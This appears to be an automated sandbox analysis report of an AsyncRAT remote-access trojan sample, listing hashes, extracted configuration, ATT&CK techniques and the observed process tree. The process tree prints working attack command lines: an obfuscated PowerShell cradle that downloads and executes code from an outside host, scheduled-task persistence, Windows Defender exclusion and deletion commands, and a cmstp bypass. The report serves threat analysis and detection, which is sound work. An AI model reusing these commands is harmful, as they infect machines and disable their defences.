asyncrat | 0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64

Analysis

max time kernel
146s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 06:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64.wsf
Size

6KB
MD5

26b251a59dc03f6ce1503678d0dddfd2
SHA1

cfa1814660079da10073d0e78d3277f83c40d3fc
SHA256

0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64
SHA512

d68634da8b45ca9457364ac6e67e79f6fa689e08ddc4fae443c08f8af563728fff25128bae6f49348ce2c4d4aab78727248bdace6e5f1e994d7f8dfba44808c0
SSDEEP

96:ur2TPTPXoPlhotyH9/qLr2TPTPXoPlhotyH9/qo:u6csYH9/qL6csYH9/qo

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Default

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/89imXRj4

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1588	WScript.exe
18	3128	powershell.exe
34	3128	powershell.exe
36	3128	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3188	powershell.exe
3828	powershell.exe
2124	powershell.exe
868	powershell.exe
3128	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4920	IObitUnlocker.exe

Loads dropped DLL 1 IoCs

pid	Process
4920	IObitUnlocker.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\downloads\desktop.ini	aspnet_compiler.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	pastebin.com
22	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
34	api.ipify.org
33	api.ipify.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\poc_exec_cmd.inf	aspnet_compiler.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3188 set thread context of 1144	3188	powershell.exe	95
PID 3828 set thread context of 3436	3828	powershell.exe	100
PID 1144 set thread context of 2924	1144	aspnet_compiler.exe	105
PID 2124 set thread context of 3904	2124	powershell.exe	121

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2256	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3128	powershell.exe
3128	powershell.exe
3188	powershell.exe
3188	powershell.exe
3828	powershell.exe
3828	powershell.exe
868	powershell.exe
868	powershell.exe
1144	aspnet_compiler.exe
4920	IObitUnlocker.exe
4920	IObitUnlocker.exe
4920	IObitUnlocker.exe
4920	IObitUnlocker.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
2124	powershell.exe
2124	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	1144	aspnet_compiler.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4920	IObitUnlocker.exe
4920	IObitUnlocker.exe
4920	IObitUnlocker.exe
4920	IObitUnlocker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1588 wrote to memory of 3128	1588	WScript.exe	84
PID 1588 wrote to memory of 3128	1588	WScript.exe	84
PID 3128 wrote to memory of 1088	3128	powershell.exe	90
PID 3128 wrote to memory of 1088	3128	powershell.exe	90
PID 3128 wrote to memory of 800	3128	powershell.exe	91
PID 3128 wrote to memory of 800	3128	powershell.exe	91
PID 3352 wrote to memory of 3188	3352	WScript.exe	93
PID 3352 wrote to memory of 3188	3352	WScript.exe	93
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 3188 wrote to memory of 1144	3188	powershell.exe	95
PID 2812 wrote to memory of 3828	2812	WScript.exe	98
PID 2812 wrote to memory of 3828	2812	WScript.exe	98
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 3828 wrote to memory of 3436	3828	powershell.exe	100
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 1144 wrote to memory of 2924	1144	aspnet_compiler.exe	105
PID 3868 wrote to memory of 868	3868	DllHost.exe	108
PID 3868 wrote to memory of 868	3868	DllHost.exe	108
PID 3868 wrote to memory of 868	3868	DllHost.exe	108
PID 1144 wrote to memory of 2256	1144	aspnet_compiler.exe	110
PID 1144 wrote to memory of 2256	1144	aspnet_compiler.exe	110
PID 1144 wrote to memory of 2256	1144	aspnet_compiler.exe	110
PID 1144 wrote to memory of 1672	1144	aspnet_compiler.exe	112
PID 1144 wrote to memory of 1672	1144	aspnet_compiler.exe	112
PID 1144 wrote to memory of 1672	1144	aspnet_compiler.exe	112
PID 1660 wrote to memory of 4920	1660	DllHost.exe	114
PID 1660 wrote to memory of 4920	1660	DllHost.exe	114
PID 1660 wrote to memory of 4920	1660	DllHost.exe	114
PID 1660 wrote to memory of 760	1660	DllHost.exe	115
PID 1660 wrote to memory of 760	1660	DllHost.exe	115
PID 1660 wrote to memory of 760	1660	DllHost.exe	115
PID 760 wrote to memory of 1292	760	mshta.exe	116
PID 760 wrote to memory of 1292	760	mshta.exe	116
PID 760 wrote to memory of 1292	760	mshta.exe	116
PID 3668 wrote to memory of 2124	3668	WScript.exe	119
PID 3668 wrote to memory of 2124	3668	WScript.exe	119
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121
PID 2124 wrote to memory of 3904	2124	powershell.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64.wsf"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://workingzoon.work.gd:777/ft7/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1088
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
    3⤵
    PID:800

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3188
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - Drops desktop.ini file(s)
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1144
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Drops file in System32 directory
      PID:2924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2256
  - - C:\Windows\SysWOW64\cmstp.exe
      "C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\ssifff04.inf
      4⤵
      System Location Discovery: System Language Discovery
      PID:1672

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3436

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\;Add-MpPreference -ExclusionPath C:\Windows;Add-MpPreference -ExclusionProcess aspnet_compiler.exe;Add-MpPreference -ExclusionPath C:\Windows\System32;Add-MpPreference -ExclusionPath C:\Windows\SysWOW64
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660
- C:\ProgramData\IObitUnlocker\IObitUnlocker.exe
  C:\ProgramData\IObitUnlocker\IObitUnlocker.exe /Delete "C:\Program Files\Windows Defender,C:\Program Files (x86)\Windows Defender"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4920
- C:\Windows\SysWOW64\mshta.exe
  mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1292

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\IObitUnlocker\IObitUnlocker.dll

Filesize
71KB

MD5
e1a4327af3cd8ca866996f472f0ff93a

SHA1
cfea8426ef8fab4136055401152821a19f908d45

SHA256
5f0bc7d75f32981e0e704c2217ed423c9a355f19515a1603103cc55cf9d3b901

SHA512
745f1ec495869d2fa2722ecadcaa27ec1f005742c69110802e9e1d7600d680d077e9762a400799e38003a4671a2590ecf1c480c2e7586039ebcce6ed36662280

Download Submit
C:\ProgramData\IObitUnlocker\IObitUnlocker.exe

Filesize
2.3MB

MD5
9303575597168ef11790500b29279f56

SHA1
bfab0ea30c5959fda893b9ddc6a348a4f47f8677

SHA256
0a507a553010c19369f17b649c5ffe6060216480059062ff75241944cf729bd7

SHA512
8e9f7a98c0a0c90643403d4abccd8736d12ba6bef83679ccfd626e52e86ed7db6fe558c6ec48a88cf32967c00d66131f550ac64cc98cd73fd477f165694e68b0

Download Submit
C:\ProgramData\IObitUnlocker\IObitUnlocker.sys

Filesize
65KB

MD5
47aa03a10ac3a407f8f30f1088edcbc9

SHA1
b5d78a1d3ae93bd343c6d65e64c0945d1d558758

SHA256
c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66

SHA512
3402ca68b00ffd9e2551f97b3895990ee0274f14f117505c3588ea76c716488860ac2da07c1d9275bbc43eb87b88893c52fb04d15f1afe7b7bf7d9a524961101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1984803359037bac71492b98c6566cb9

SHA1
bd23b3e8009df4ecc50052da8f2e0ba1bb3c435a

SHA256
6ae28c6b7ed1a6f67c7e387be3b45f3097b08416ee5742a7f616d336d667fcac

SHA512
c4e953a9646a9618d3e705e665983daf2c8f7629469227315fbd42b8e0abf59d75a5f90e8ae926a2d09916a12829ddca2111e7e3c9d448bd055572e2af7ed543

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
bfd1a10d266ba3a95e1852f5670ac308

SHA1
396f7436d0bd648f02e93613ab68dba49282d548

SHA256
4f594f43ed1957922f9367ee8f2bcca2f5c79fcb550483c7e76502531339f19c

SHA512
1755f32bd5c670c5ce3ffd676503336039792374dc7465368907d0efeab6ddf34a93a12a26c4ec538a45857017593dd15e9ed4a7a87727eac2fb4185dbb85339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6fe7f2ff9f024b0658a4113e39b826fc

SHA1
07a0d4ec3b19b62fd409ddb60e843021ac40f1f3

SHA256
e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1

SHA512
64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b08088381b41dd16b0823bdacafdb0b4

SHA1
45bca1e9de9a437f6ac37daf77fd796db55582e9

SHA256
5939138321e2b50d8009640335cf28acd4455504f149521b41ec6db1f4f98fed

SHA512
4fdb1a864c8688a1e75d6e768137012dd0849bf8d960a8c2846a77b2e5855750dbdb4c14e426f776d0e4de33fcaa9f87a964c8f0b694c652d6ed379c84ed88a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kcr4jpv4.t4w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml

Filesize
1KB

MD5
26913303151afee791eb652db6764fe2

SHA1
49418253140caeacb2a1b5bfac48f4bc8e8d5b24

SHA256
14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248

SHA512
5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

Download Submit
C:\Users\Public\Music\TvMusic.music

Filesize
436KB

MD5
3b36acc4ce95323ee262a80982c04a5e

SHA1
807c596fb88e8b21c86ef67643c9ad6aa726b057

SHA256
0c68094b897b9263a10d9d0c93838d41e0ee8cd09f9f36ad79b1c02fe1bec701

SHA512
eff18d5a889dd74f9819af826a9b7c466120d6a869db2a422684058d1ee0bf5177ad4491eadef3092097319fb6258f25951e352735c5fe1412f096572b17ed5d

Download Submit
C:\Users\Public\Music\TvMusic.vbs

Filesize
229B

MD5
66a1516e1d1e821084441211567d2e87

SHA1
0e688c9a93ad2cc162ef48ca75e0148e69d95ab1

SHA256
d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717

SHA512
1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12

Download Submit
C:\Windows\temp\ssifff04.inf

Filesize
810B

MD5
f3e91eb0f7d179abffa9bc21bb7d619e

SHA1
2f1935074796cebd530895915d2b3d1a6dfa7fb2

SHA256
e519b39ffa079675903737d9a2cd56836e3d4de2672d9122b2b7ce0d62520bf6

SHA512
a976494dfbbaa3771efda0297e54cf83ea221e8e576e23d6247fff9651d7b382cdc183f4688257d28d41b433039314950224b7bdc0c204656d73f7a59b8b617b

Download Submit
memory/868-106-0x0000000007090000-0x000000000709E000-memory.dmp

Filesize
56KB

Download
memory/868-87-0x0000000005B60000-0x0000000005BAC000-memory.dmp

Filesize
304KB

Download
memory/868-109-0x0000000007180000-0x0000000007188000-memory.dmp

Filesize
32KB

Download
memory/868-108-0x00000000071A0000-0x00000000071BA000-memory.dmp

Filesize
104KB

Download
memory/868-107-0x00000000070A0000-0x00000000070B4000-memory.dmp

Filesize
80KB

Download
memory/868-105-0x0000000007060000-0x0000000007071000-memory.dmp

Filesize
68KB

Download
memory/868-104-0x00000000070E0000-0x0000000007176000-memory.dmp

Filesize
600KB

Download
memory/868-103-0x0000000006ED0000-0x0000000006EDA000-memory.dmp

Filesize
40KB

Download
memory/868-102-0x0000000006E60000-0x0000000006E7A000-memory.dmp

Filesize
104KB

Download
memory/868-101-0x00000000074A0000-0x0000000007B1A000-memory.dmp

Filesize
6.5MB

Download
memory/868-100-0x0000000006D40000-0x0000000006DE3000-memory.dmp

Filesize
652KB

Download
memory/868-99-0x0000000006100000-0x000000000611E000-memory.dmp

Filesize
120KB

Download
memory/868-89-0x000000006F490000-0x000000006F4DC000-memory.dmp

Filesize
304KB

Download
memory/868-88-0x0000000006D00000-0x0000000006D32000-memory.dmp

Filesize
200KB

Download
memory/868-71-0x0000000002200000-0x0000000002236000-memory.dmp

Filesize
216KB

Download
memory/868-72-0x0000000004E00000-0x0000000005428000-memory.dmp

Filesize
6.2MB

Download
memory/868-73-0x0000000004D70000-0x0000000004D92000-memory.dmp

Filesize
136KB

Download
memory/868-79-0x00000000054A0000-0x0000000005506000-memory.dmp

Filesize
408KB

Download
memory/868-84-0x0000000005580000-0x00000000058D4000-memory.dmp

Filesize
3.3MB

Download
memory/868-86-0x0000000005B30000-0x0000000005B4E000-memory.dmp

Filesize
120KB

Download
memory/1144-112-0x00000000087C0000-0x0000000008A1A000-memory.dmp

Filesize
2.4MB

Download
memory/1144-154-0x0000000006CE0000-0x0000000006D42000-memory.dmp

Filesize
392KB

Download
memory/1144-52-0x0000000005EB0000-0x0000000005F4C000-memory.dmp

Filesize
624KB

Download
memory/1144-66-0x0000000008760000-0x00000000087BC000-memory.dmp

Filesize
368KB

Download
memory/1144-65-0x00000000084D0000-0x000000000851A000-memory.dmp

Filesize
296KB

Download
memory/1144-64-0x00000000072E0000-0x0000000007372000-memory.dmp

Filesize
584KB

Download
memory/1144-63-0x00000000071F0000-0x000000000720E000-memory.dmp

Filesize
120KB

Download
memory/1144-62-0x0000000007080000-0x00000000070E0000-memory.dmp

Filesize
384KB

Download
memory/1144-61-0x0000000007100000-0x0000000007176000-memory.dmp

Filesize
472KB

Download
memory/1144-32-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1144-54-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/1144-53-0x0000000006730000-0x0000000006CD4000-memory.dmp

Filesize
5.6MB

Download
memory/1292-151-0x0000000006930000-0x000000000697C000-memory.dmp

Filesize
304KB

Download
memory/1292-152-0x0000000006CE0000-0x0000000006D02000-memory.dmp

Filesize
136KB

Download
memory/1292-145-0x0000000006100000-0x0000000006454000-memory.dmp

Filesize
3.3MB

Download
memory/2924-68-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2924-67-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/3128-56-0x000001F3F5800000-0x000001F3F59C2000-memory.dmp

Filesize
1.8MB

Download
memory/3128-35-0x00007FFFCDA13000-0x00007FFFCDA15000-memory.dmp

Filesize
8KB

Download
memory/3128-47-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-15-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-57-0x000001F3F5F00000-0x000001F3F6428000-memory.dmp

Filesize
5.2MB

Download
memory/3128-3-0x00007FFFCDA13000-0x00007FFFCDA15000-memory.dmp

Filesize
8KB

Download
memory/3128-60-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-14-0x00007FFFCDA10000-0x00007FFFCE4D1000-memory.dmp

Filesize
10.8MB

Download
